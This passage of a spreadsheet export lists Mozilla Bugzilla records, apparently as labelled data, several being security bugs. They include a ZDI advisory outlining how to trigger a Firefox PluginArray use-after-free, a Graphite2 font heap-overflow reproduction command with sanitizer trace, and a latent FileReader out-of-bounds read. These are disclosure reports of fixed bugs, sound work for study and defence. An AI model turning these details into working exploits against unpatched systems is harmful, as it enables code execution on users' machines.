      </c>
      <c r="I5959" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5959" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5959" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5959" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5959" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5959" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5959" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5959" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5959" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5959" t="inlineStr">
        <is>
          <t>mozilla1.9.3a2</t>
        </is>
      </c>
      <c r="T5959" t="n">
        <v>1</v>
      </c>
      <c r="U5959" t="n">
        <v>0</v>
      </c>
      <c r="V5959" t="n">
        <v>11</v>
      </c>
      <c r="W5959" t="inlineStr">
        <is>
          <t>ZDI-CAN-655: Mozilla Firefox PluginArray nsMimeType Dangling Pointer Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following  products:
    Mozilla Firefox 3.5.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that a user must be coerced to viewing a malicious document.
The specific flaw exists within the way the application implements the window.navigator.plugins array. Due to the application freeing the contents of the array while a reference to one of the elements is still being used, an attacker can utilize the free reference to call arbitrary code. Successful exploitation can lead to code execution under the context of the application.
The particular vulnerability occurs within the window.navigator.plugins array. This array is implemented within dom/src/base/nsPluginArray.cpp. Each element of this array contains a reference to the mime types installed by that particular plugin.
Upon page reload, the plugin array will reallocate all of it's members without explictly checking the used reference count of each member. If an attacker grabs a reference out of the array, and causes the page to reload itself, the attacker will then have a variable that references data that has been freed by the page refresh.
The mPlugin property contains the reference to the plugin that will get freed.
dom/src/base/nsMimeTypeArray.cpp:304
NS_IMETHODIMP
nsMimeType::GetEnabledPlugin(nsIDOMPlugin** aEnabledPlugin)
{
  nsAutoString type;
  GetType(type);
  PRBool disabled = PR_FALSE;
  if (type.Length() == 1 &amp;&amp; type.First() == '*') {
    // Check if the default plugin is disabled.
    disabled =
nsContentUtils::GetBoolPref("plugin.default_plugin_disabled");
  }
  *aEnabledPlugin = disabled ? nsnull : mPlugin;        // XXX: mPlugin
  NS_IF_ADDREF(*aEnabledPlugin);
  return NS_OK;
}
Only place that modifies mPlugin property.
nsMimeType::nsMimeType(nsIDOMPlugin* aPlugin, nsIDOMMimeType*
aMimeType)
{
  mPlugin = aPlugin;       // XXX
  mMimeType = aMimeType;
}
For each plugin, allocate the mime type associated with it.
dom/src/base/nsPluginArray.cpp:405
nsresult
nsPluginElement::GetMimeTypes()
{
  nsresult rv = mPlugin-&gt;GetLength(&amp;mMimeTypeCount);
  if (rv == NS_OK) {
    mMimeTypeArray = new nsIDOMMimeType*[mMimeTypeCount];
    if (mMimeTypeArray == nsnull)
      return NS_ERROR_OUT_OF_MEMORY;
    for (PRUint32 i = 0; i &lt; mMimeTypeCount; i++) {
      nsCOMPtr&lt;nsIDOMMimeType&gt; mimeType;
      rv = mPlugin-&gt;Item(i, getter_AddRefs(mimeType));
      if (rv != NS_OK)
        break;
      mimeType = new nsMimeType(this, mimeType);    // XXX: /this/
contains our dangling reference
      NS_IF_ADDREF(mMimeTypeArray[i] = mimeType);
    }
  }
  return rv;
}
Reload the entire plugin array
dom/src/base/nsPluginArray.cpp:199
NS_IMETHODIMP
nsPluginArray::Refresh(PRBool aReloadDocuments)
{
  nsresult res = NS_OK;
  if (!AllowPlugins())
    return NS_SUCCESS_LOSS_OF_INSIGNIFICANT_DATA;
Delete every element of an nsPluginArray
dom/src/base/nsPluginArray.cpp:236
  if (mPluginArray != nsnull) {
    for (PRUint32 i = 0; i &lt; mPluginCount; i++) 
      NS_IF_RELEASE(mPluginArray[i]);               // XXX
    delete[] mPluginArray;
  }
Version(s)  tested: FireFox 3.5.6
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X5959" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5960">
      <c r="A5960" t="n">
        <v>1352745</v>
      </c>
      <c r="B5960" t="inlineStr">
        <is>
          <t>2017-04-01 13:55:05 -0700</t>
        </is>
      </c>
      <c r="C5960" t="inlineStr">
        <is>
          <t>Graphite2 heap-buffer-overflow write [@ lz4::decompress]</t>
        </is>
      </c>
      <c r="D5960" t="inlineStr">
        <is>
          <t>2017-10-26 19:20:34 -0700</t>
        </is>
      </c>
      <c r="E5960" t="n">
        <v>1</v>
      </c>
      <c r="F5960" t="n">
        <v>1</v>
      </c>
      <c r="G5960" t="n">
        <v>3</v>
      </c>
      <c r="H5960" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5960" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5960" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5960" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5960" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5960" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5960" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5960" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5960" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5960" t="n">
        <v>1</v>
      </c>
      <c r="U5960" t="n">
        <v>0</v>
      </c>
      <c r="V5960" t="n">
        <v>6</v>
      </c>
      <c r="W5960" t="inlineStr">
        <is>
          <t>Created attachment 8853697
test_case.ttf
Found in 28cc60d with a 32 bit build.
To reproduce run:
./gr2fonttest -auto -demand test_case.ttf
==4360==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5202b0f at pc 0x081ad092 bp 0xffadad08 sp 0xffadacfc
WRITE of size 16 at 0xf5202b0f thread T0
    #0 0x81ad091 in (anonymous namespace)::safe_copy(unsigned char*, unsigned char const*, unsigned int) src/inc/Compression.h:65:22
    #1 0x81ad091 in lz4::decompress(void const*, unsigned int, void*, unsigned int) src/Decompressor.cpp:103
    #2 0x814e6ac in graphite2::Face::Table::decompress() src/Face.cpp:339:20
    #3 0x814dd32 in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) src/Face.cpp:292:9
    #4 0x8140540 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) src/gr_face.cpp:49:21
    #5 0x8141aba in gr_make_face_with_ops src/gr_face.cpp:89:16
    #6 0x8141aba in gr_make_file_face src/gr_face.cpp:242
    #7 0x813b99e in Parameters::testFileFont() const gr2fonttest/gr2FontTest.cpp:639:20
    #8 0x813d9d3 in main gr2fonttest/gr2FontTest.cpp:798:9
    #9 0xf753c636 in __libc_start_main /build/glibc-5sb1ri/glibc-2.23/csu/../csu/libc-start.c:291
    #10 0x805fe47 in _start (graphite2/gr2fonttest+0x805fe47)
0xf5202b0f is located 11 bytes to the right of 10756-byte region [0xf5200100,0xf5202b04)
allocated by thread T0 here:
    #0 0x8104184 in __interceptor_malloc (/home/user/workspace/graphite2/gr2fonttest+0x8104184)
    #1 0x814e5f2 in unsigned char* graphite2::gralloc&lt;unsigned char&gt;(unsigned int) src/inc/Main.h:88:28
    #2 0x814e5f2 in graphite2::Face::Table::decompress() src/Face.cpp:333
    #3 0x814dd32 in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) src/Face.cpp:292:9
    #4 0x8140540 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) src/gr_face.cpp:49:21
    #5 0x8141aba in gr_make_face_with_ops src/gr_face.cpp:89:16
    #6 0x8141aba in gr_make_file_face src/gr_face.cpp:242
    #7 0x813b99e in Parameters::testFileFont() const gr2fonttest/gr2FontTest.cpp:639:20
    #8 0x813d9d3 in main gr2fonttest/gr2FontTest.cpp:798:9
    #9 0xf753c636 in __libc_start_main /build/glibc-5sb1ri/glibc-2.23/csu/../csu/libc-start.c:291</t>
        </is>
      </c>
      <c r="X5960" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5961">
      <c r="A5961" t="n">
        <v>1674343</v>
      </c>
      <c r="B5961" t="inlineStr">
        <is>
          <t>2020-10-30 02:36:31 -0700</t>
        </is>
      </c>
      <c r="C5961" t="inlineStr">
        <is>
          <t>Service worker can control a non-secure context client</t>
        </is>
      </c>
      <c r="D5961" t="inlineStr">
        <is>
          <t>2021-12-21 13:48:09 -0800</t>
        </is>
      </c>
      <c r="E5961" t="n">
        <v>1</v>
      </c>
      <c r="F5961" t="n">
        <v>1</v>
      </c>
      <c r="G5961" t="n">
        <v>3</v>
      </c>
      <c r="H5961" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5961" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5961" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5961" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5961" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5961" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5961" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5961" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main84+][adv-esr78.7+], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q5961" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5961" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5961" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T5961" t="n">
        <v>1</v>
      </c>
      <c r="U5961" t="n">
        <v>0</v>
      </c>
      <c r="V5961" t="n">
        <v>22</v>
      </c>
      <c r="W5961" t="inlineStr">
        <is>
          <t>An HTTPS iframe embedded in an HTTP page is loaded with a service worker (if one is registered), even though it's not a secure context.</t>
        </is>
      </c>
      <c r="X5961" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5962">
      <c r="A5962" t="n">
        <v>1826666</v>
      </c>
      <c r="B5962" t="inlineStr">
        <is>
          <t>2023-04-05 14:43:02 -0700</t>
        </is>
      </c>
      <c r="C5962" t="inlineStr">
        <is>
          <t>Latent read and write beyond bounds in FileReader::DoReadData()</t>
        </is>
      </c>
      <c r="D5962" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:58 -0700</t>
        </is>
      </c>
      <c r="E5962" t="n">
        <v>1</v>
      </c>
      <c r="F5962" t="n">
        <v>1</v>
      </c>
      <c r="G5962" t="n">
        <v>3</v>
      </c>
      <c r="H5962" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5962" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5962" t="inlineStr">
        <is>
          <t>DOM: File</t>
        </is>
      </c>
      <c r="K5962" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5962" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5962" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5962" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5962" t="inlineStr">
        <is>
          <t>[adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q5962" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5962" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5962" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T5962" t="n">
        <v>1</v>
      </c>
      <c r="U5962" t="n">
        <v>0</v>
      </c>
      <c r="V5962" t="n">
        <v>15</v>
      </c>
      <c r="W5962" t="inlineStr">
        <is>
          <t>Created attachment 9327240
ffbug_2118.htm
`FileReader::DoReadData()` fails to initialize the variable `read` that it passes to `nsIAsyncInputStream::Read()` . If `nsIAsyncInputStream::Read()` were to return `NS_BASE_STREAM_CLOSED` without initializing `read`, `FileReader::DoReadData()` would use the resulting uninitialized stack variable to determine how much data to read from a stack buffer into an output buffer (line 326, below) and to update, among other things, a pointer to an output buffer (line 328, below), potentially causing a read and/or write beyond bounds. [1]
The bug appears to be latent. Using `FileReader::readAsBinaryString()` on `File` and `Blob` objects causes FF to call this function, but the relevant stream is always buffered (and thus handled by lines 303-06), which prevents control from reaching the buggy code. [2] I do not know whether there is another way to reach the buggy code.
The bug is on line 312, which doesn't initialize `read`:
```
283: nsresult FileReader::DoReadData(uint64_t aCount) {
284:   MOZ_ASSERT(mAsyncStream);
285: 
286:   uint32_t bytesRead = 0;
287: 
288:   if (mDataFormat == FILE_AS_BINARY) {
289:     // Continuously update our binary string as data comes in
290:     CheckedInt&lt;uint64_t&gt; size{mResult.Length()};
291:     size += aCount;
292: 
293:     if (!size.isValid() || size.value() &gt; UINT32_MAX || size.value() &gt; mTotal) {
294:       return NS_ERROR_OUT_OF_MEMORY;
295:     }
296: 
297:     uint32_t lenBeforeRead = mResult.Length();
298:     MOZ_ASSERT(lenBeforeRead == mDataLen, "unexpected mResult length");
299: 
300:     mResult.SetLength(lenBeforeRead + aCount);
301:     char16_t* currentPos = mResult.BeginWriting() + lenBeforeRead;
302: 
303:     if (NS_InputStreamIsBuffered(mAsyncStream)) {
304:       nsresult rv = mAsyncStream-&gt;ReadSegments(ReadFuncBinaryString, currentPos,
305:                                                aCount, &amp;bytesRead);
306:       NS_ENSURE_SUCCESS(rv, NS_OK);
307:     } else {
308:       while (aCount &gt; 0) {
309:         char tmpBuffer[4096];
310:         uint32_t minCount =
311:             XPCOM_MIN(aCount, static_cast&lt;uint64_t&gt;(sizeof(tmpBuffer)));
312:         uint32_t read;
313: 
314:         nsresult rv = mAsyncStream-&gt;Read(tmpBuffer, minCount, &amp;read);
315:         if (rv == NS_BASE_STREAM_CLOSED) {
316:           rv = NS_OK;
317:         }
318: 
319:         NS_ENSURE_SUCCESS(rv, NS_OK);
320: 
321:         if (read == 0) {
322:           // The stream finished too early.
323:           return NS_ERROR_OUT_OF_MEMORY;
324:         }
325: 
326:         PopulateBufferForBinaryString(currentPos, tmpBuffer, read);
327: 
328:         currentPos += read;
329:         aCount -= read;
330:         bytesRead += read;
331:       }
332:     }
...
360: }
```
[1] Some implementations of `Read()` can return `NS_BASE_STREAM_CLOSED` without initializing `read` (e.g., `ThrottleInputStream::Read()` (`netwerk/base/ThrottleQueue.cpp`) ) , despite the `nsIInputStream` contract prohibiting this return code (see `nsIInputStream.idl`)
[2] Attached is a page that causes FF to call `FileReader::DoReadData()` . Load it in FF and click "Browse" to select a text file, which causes FF to call it with a `File` object or click "click!" to cause FF to call it with a `Blob` object.</t>
        </is>
      </c>
      <c r="X5962" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5963">
      <c r="A5963" t="n">
        <v>1523324</v>
      </c>
      <c r="B5963" t="inlineStr">
        <is>
          <t>2019-01-28 08:11:46 -0800</t>
        </is>
      </c>
      <c r="C5963" t="inlineStr">
        <is>
          <t>Intermittent requests.exceptions.HTTPError: 503 Server Error: Service Unavailable for url: https://queue.taskcluster.net/v1/task/U_XYOXu8SlqXHpJX-1pgyQ/artifacts/public/build/target.generated-files.tar.gz</t>
        </is>
      </c>
      <c r="D5963" t="inlineStr">
        <is>
          <t>2019-05-06 06:59:55 -0700</t>
        </is>
      </c>
      <c r="E5963" t="n">
        <v>1</v>
      </c>
      <c r="F5963" t="n">
        <v>1</v>
      </c>
      <c r="G5963" t="n">
        <v>7</v>
      </c>
      <c r="H5963" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5963" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5963" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5963" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5963" t="inlineStr"/>
      <c r="Q5963" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R5963" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5963" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5963" t="n">
        <v>1</v>
      </c>
      <c r="U5963" t="n">
        <v>0</v>
      </c>
      <c r="V5963" t="n">
        <v>11</v>
      </c>
      <c r="W5963" t="inlineStr">
        <is>
          <t>#[markdown(off)]
Filed by: nerli [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=224427646&amp;repo=try
https://queue.taskcluster.net/v1/task/ZOdZ6jSoRmK7w0vrRcqRAA/runs/0/artifacts/public/logs/live_backing.log
[task 2019-01-28T11:43:27.436Z] Error processing command. Ignoring because optional. (optional:packages.txt:comm/build/virtualenv_packages.txt)
[task 2019-01-28T11:43:28.412Z] Collecting boto3==1.4.4
[task 2019-01-28T11:43:28.731Z]   Downloading https://files.pythonhosted.org/packages/91/60/649da03299624f524c8d0cd4c6c73c194023e85dd4938f1e7712ab6888bf/boto3-1.4.4-py2.py3-none-any.whl (127kB)
[task 2019-01-28T11:43:28.869Z] Collecting botocore&lt;1.6.0,&gt;=1.5.0 (from boto3==1.4.4)
[task 2019-01-28T11:43:29.435Z]   Downloading https://files.pythonhosted.org/packages/be/83/6807ca70447bf7edf103e0b16553e729a5b7dc8e67c882f1ed57fdc3121c/botocore-1.5.95-py2.py3-none-any.whl (3.6MB)
[task 2019-01-28T11:43:30.073Z] Collecting jmespath&lt;1.0.0,&gt;=0.7.1 (from boto3==1.4.4)
[task 2019-01-28T11:43:30.111Z]   Downloading https://files.pythonhosted.org/packages/b7/31/05c8d001f7f87f0f07289a5fc0fc3832e9a57f2dbd4d3b0fee70e0d51365/jmespath-0.9.3-py2.py3-none-any.whl
[task 2019-01-28T11:43:30.225Z] Collecting s3transfer&lt;0.2.0,&gt;=0.1.10 (from boto3==1.4.4)
[task 2019-01-28T11:43:30.264Z]   Downloading https://files.pythonhosted.org/packages/d7/14/2a0004d487464d120c9fb85313a75cd3d71a7506955be458eebfe19a6b1d/s3transfer-0.1.13-py2.py3-none-any.whl (59kB)
[task 2019-01-28T11:43:30.387Z] Collecting docutils&gt;=0.10 (from botocore&lt;1.6.0,&gt;=1.5.0-&gt;boto3==1.4.4)
[task 2019-01-28T11:43:30.423Z]   Downloading https://files.pythonhosted.org/packages/50/09/c53398e0005b11f7ffb27b7aa720c617aba53be4fb4f4f3f06b9b5c60f28/docutils-0.14-py2-none-any.whl (543kB)
[task 2019-01-28T11:43:30.618Z] Collecting python-dateutil&lt;3.0.0,&gt;=2.1 (from botocore&lt;1.6.0,&gt;=1.5.0-&gt;boto3==1.4.4)
[task 2019-01-28T11:43:30.671Z]   Downloading https://files.pythonhosted.org/packages/74/68/d87d9b36af36f44254a8d512cbfc48369103a3b9e474be9bdfe536abfc45/python_dateutil-2.7.5-py2.py3-none-any.whl (225kB)
[task 2019-01-28T11:43:30.759Z] Requirement already satisfied: futures&lt;4.0.0,&gt;=2.2.0; python_version == "2.6" or python_version == "2.7" in ./third_party/python/futures (from s3transfer&lt;0.2.0,&gt;=0.1.10-&gt;boto3==1.4.4)
[task 2019-01-28T11:43:30.813Z] Collecting six&gt;=1.5 (from python-dateutil&lt;3.0.0,&gt;=2.1-&gt;botocore&lt;1.6.0,&gt;=1.5.0-&gt;boto3==1.4.4)
[task 2019-01-28T11:43:30.855Z]   Downloading https://files.pythonhosted.org/packages/73/fb/00a976f728d0d1fecfe898238ce23f502a721c0ac0ecfedb80e0d88c64e9/six-1.12.0-py2.py3-none-any.whl
[task 2019-01-28T11:43:30.913Z] Installing collected packages: jmespath, docutils, six, python-dateutil, botocore, s3transfer, boto3
[task 2019-01-28T11:43:31.815Z] Successfully installed boto3-1.4.4 botocore-1.5.95 docutils-0.14 jmespath-0.9.3 python-dateutil-2.7.5 s3transfer-0.1.13 six-1.12.0
[task 2019-01-28T11:43:31.958Z] You are using pip version 9.0.3, however version 19.0.1 is available.
[task 2019-01-28T11:43:31.958Z] You should consider upgrading via the 'pip install --upgrade pip' command.
[task 2019-01-28T11:43:31.984Z] INFO - MainThread - Using AWS credentials from the secrets service: "http://taskcluster/secrets/v1/secret/project/releng/gecko/build/level-1/gecko-generated-sources-upload"
[task 2019-01-28T11:43:32.154Z] INFO - MainThread - Fetching generated sources artifact: "https://queue.taskcluster.net/v1/task/U_XYOXu8SlqXHpJX-1pgyQ/artifacts/public/build/target.generated-files.tar.gz"
[task 2019-01-28T11:44:04.179Z] INFO - MainThread - Fetch HTTP status: 503, 506 bytes downloaded in 32.026s
[task 2019-01-28T11:44:04.179Z] Traceback (most recent call last):
[task 2019-01-28T11:44:04.179Z]   File "build/upload_generated_sources.py", line 161, in &lt;module&gt;
[task 2019-01-28T11:44:04.179Z]     sys.exit(main(sys.argv[1:]))
[task 2019-01-28T11:44:04.179Z]   File "build/upload_generated_sources.py", line 155, in main
[task 2019-01-28T11:44:04.180Z]     do_work(region=region, bucket=bucket, artifact=args.artifact)
[task 2019-01-28T11:44:04.180Z]   File "build/upload_generated_sources.py", line 117, in do_work
[task 2019-01-28T11:44:04.180Z]     res.raise_for_status()
[task 2019-01-28T11:44:04.180Z]   File "/builds/worker/checkouts/gecko/third_party/python/requests/requests/models.py", line 840, in raise_for_status
[task 2019-01-28T11:44:04.180Z]     raise HTTPError(http_error_msg, response=self)
[task 2019-01-28T11:44:04.181Z] requests.exceptions.HTTPError: 503 Server Error: Service Unavailable for url: https://queue.taskcluster.net/v1/task/U_XYOXu8SlqXHpJX-1pgyQ/artifacts/public/build/target.generated-files.tar.gz
[taskcluster 2019-01-28 11:44:04.568Z] === Task Finished ===
[taskcluster 2019-01-28 11:44:04.568Z] Unsuccessful task run with exit code: 1 completed in 249.96 seconds</t>
        </is>
      </c>
      <c r="X5963" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5964">
      <c r="A5964" t="n">
        <v>871462</v>
      </c>
      <c r="B5964" t="inlineStr">
        <is>
          <t>2013-05-13 02:36:10 -0700</t>
        </is>
      </c>
      <c r="C5964" t="inlineStr">
        <is>
          <t>Clean up String API usages for dom/system/gonk</t>
        </is>
      </c>
      <c r="D5964" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:34 -0800</t>
        </is>
      </c>
      <c r="E5964" t="n">
        <v>1</v>
      </c>
      <c r="F5964" t="n">
        <v>1</v>
      </c>
      <c r="G5964" t="n">
        <v>3</v>
      </c>
      <c r="H5964" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5964" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5964" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K5964" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5964" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5964" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5964" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q5964" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5964" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5964" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T5964" t="n">
        <v>1</v>
      </c>
      <c r="U5964" t="n">
        <v>0</v>
      </c>
      <c r="V5964" t="n">
        <v>13</v>
      </c>
      <c r="W5964" t="inlineStr">
        <is>
          <t>Created attachment 748718
fix</t>
        </is>
      </c>
      <c r="X5964" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5965">
      <c r="A5965" t="n">
        <v>1118023</v>
      </c>
      <c r="B5965" t="inlineStr">
        <is>
          <t>2015-01-05 14:50:30 -0800</t>
        </is>
      </c>
      <c r="C5965" t="inlineStr">
        <is>
          <t>Update to django-browserid 0.10</t>
        </is>
      </c>
      <c r="D5965" t="inlineStr">
        <is>
          <t>2015-04-28 11:15:07 -0700</t>
        </is>
      </c>
      <c r="E5965" t="n">
        <v>1</v>
      </c>
      <c r="F5965" t="n">
        <v>1</v>
      </c>
      <c r="G5965" t="n">
        <v>7</v>
      </c>
      <c r="H5965" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5965" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5965" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5965" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5965" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5965" t="inlineStr"/>
      <c r="Q5965" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5965" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5965" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5965" t="n">
        <v>1</v>
      </c>
      <c r="U5965" t="n">
        <v>0</v>
      </c>
      <c r="V5965" t="n">
        <v>14</v>
      </c>
      <c r="W5965" t="inlineStr">
        <is>
          <t>Quite a few exceptions of form:
[2015-01-03 19:45:00,226: INFO/Worker-1055] Loading BROWSERID_VERIFY_CLASS failed: Setting BROWSERID_VERIFY_CLASS not found.
[2015-01-03 19:45:00,226: INFO/Worker-1055] Traceback (most recent call last):
  File "/usr/lib/python2.6/site-packages/django_browserid/urls.py", line 18, in &lt;module&gt;
    Verify = import_from_setting('BROWSERID_VERIFY_CLASS')
  File "/usr/lib/python2.6/site-packages/django_browserid/util.py", line 38, in import_from_setting
    raise ImproperlyConfigured('Setting {0} not found.'.format(setting))
ImproperlyConfigured: Setting BROWSERID_VERIFY_CLASS not found.</t>
        </is>
      </c>
      <c r="X5965" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5966">
      <c r="A5966" t="n">
        <v>587234</v>
      </c>
      <c r="B5966" t="inlineStr">
        <is>
          <t>2010-08-13 17:23:45 -0700</t>
        </is>
      </c>
      <c r="C5966" t="inlineStr">
        <is>
          <t>Better error reporting for tiny ephemeral Diffie-Hellman (DHE) keys in Server Key Exchange</t>
        </is>
      </c>
      <c r="D5966" t="inlineStr">
        <is>
          <t>2010-11-08 06:30:13 -0800</t>
        </is>
      </c>
      <c r="E5966" t="n">
        <v>1</v>
      </c>
      <c r="F5966" t="n">
        <v>1</v>
      </c>
      <c r="G5966" t="n">
        <v>3</v>
      </c>
      <c r="H5966" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5966" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5966" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5966" t="inlineStr">
        <is>
          <t>3.12.7</t>
        </is>
      </c>
      <c r="L5966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5966" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5966" t="inlineStr"/>
      <c r="Q5966" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5966" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5966" t="inlineStr">
        <is>
          <t>3.12.8</t>
        </is>
      </c>
